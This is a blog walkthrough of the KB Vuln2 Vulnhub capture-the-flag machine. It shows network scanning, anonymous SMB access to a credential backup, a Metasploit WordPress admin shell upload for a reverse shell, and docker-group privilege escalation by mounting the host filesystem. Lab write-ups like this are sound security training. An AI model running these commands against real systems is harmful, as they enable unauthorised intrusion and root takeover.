Vulnhub Walkthrough

KB Vuln2 Vulnhub Walkthrough

Today, we will share another vulnhub machine walkthrough is named KB Vuln2. This is another boot to root challenge. Difficult of the VM easy level. You can download here the machine.

Network Scanning

Let’s start off by scanning the network and identifying the host IP address within the same network. Run the netdiscover command.

sudo netdiscover

So it looks like is our target IP. The next step is to scan the target with the Nmap tool to check for any open ports and probe for running services on the VM. run the following command.

nmap -sV

Nmap scan output is shown the target machine open ports. 21/FT, 22/SSH, 80/HTTP apache server, 139/445 Smb Samba Server is running.

SMB Reconnaissance

SMBMap allows users to enumerate samba share drives across an entire domain IP. List share drives, drive permissions, Let’s discovering All Drives and Users. run the following command.

And result output is the target machine is allowed anonymous user login. Let’s connect with the drive by using the smbclient tool. we run the dir command for listing all directory and files and we found something useful we got a file let’s download the file our local machine.

smbmap -H
smbclient //

After Download the file we extract the backup file and we found an admin credential and WordPress setup directory.

cat remember_me.txt

we navigate the /wordpress/admin directory and we try to login with admin user and us successfully login with admin user as administrator rights.

Let’s get the reverse shell Without wasting our time we run the msfconsole and load the wp_admin_shell_upload exploit and set targeturi and admin username and password.

sudo msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts
set targeturi /wordpress
set username admin
set password ......
set lport 445
python -c 'import pty;pty.spawn("/bin/bash")'

Now we have a target machine proper bash shell let’s enumerate the host machine users and groups and check sudo permission for www-data user. but there is nothing useful found then we try the same WordPress password for the kbadmin user login.

su kbadmin

Privilege Escalation

again we check suid permission and user, groups and we found something useful kbadmin user have docker group permission. it’s means we run the docker without any superuser privilege.

we run the docker images command for checking all images docker containers but currently, docker hasn’t any image. let’s run the docker privilege escalation command.

  • -it => interactive mode
  • -v => verbose mode
  • / => target mounting directory
  • :mnt => docker mounting point
docker images
docker run -it -v /:/mnt ubuntu

since we already check currently docker hasn’t any images file After run the privilege escalation command docker is pulling in the Ubuntu server it takes a few time.

After seeing the Pull complete message our docker v-machine is automatically run and we got a root shell ubuntu server for reading our root flag let’s move the /mnt/root directory and read the root flag.

cd /mnt
cd root
cat flag.txt

Funbox Easy Vulnhub Walkthrough link

By Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View Archive